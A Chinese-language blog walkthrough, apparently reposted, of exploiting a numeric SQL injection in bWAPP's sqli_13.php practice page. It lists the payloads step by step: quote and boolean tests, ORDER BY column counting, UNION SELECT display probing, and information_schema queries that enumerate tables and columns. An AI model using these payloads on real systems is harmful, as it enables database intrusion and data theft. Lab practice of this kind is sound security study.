您的位置:首页 > 移动开发

SQL注入之bWAPP之sqli_13.php

2018-03-28 18:40 344 查看
1、还是老样子查看POST参数然后构造,结果如图:



2、在hackbar的POST框中输入“movie=1'”,报错中包含三个单引号,说明应该是数字型注入,结果如图:



3、输入“movie=1 and 1=1”正常,输入“movie=1 and 1=2”报错,结果如下图:





所以该处存在数字型注入点
4、判断字段数:
输入“movie=1 order by 7”正常,输入“movie=1 order by 8”报错,说明字段数为7,结果如图:





查看显示位置,输入“movie=-1 union select 1,2,3,4,5,6,7”,结果如图:



5、查询数据库等信息:
输入“movie=-1 union select 1,database(),version(),4,user(),6,7”,查看数据库名、数据库版本、当前用户,结果如图:



6、查询表名:
输入“movie=-1 union select 1,database(),version(),table_name,user(),6,7 from information_schema.tables where table_schema='bwapp'”,表名为blog,结果如图:



7、查询字段名:
输入“movie=-1 union select 1,database(),version(),column_name,user(),6,7 from information_schema.columns where table_name='blog'”,字段名为id,结果如图:



8、查询字段内容:
输入“movie=-1 union select 1,database(),version(),id,user(),6,7 from blog”,字段无内容。
内容来自用户分享和网络整理,不保证内容的准确性,如有侵权内容,可联系管理员处理 点击这里给我发消息
标签:  bWAPP sqli 13.php
相关文章推荐
新的分享
章节导航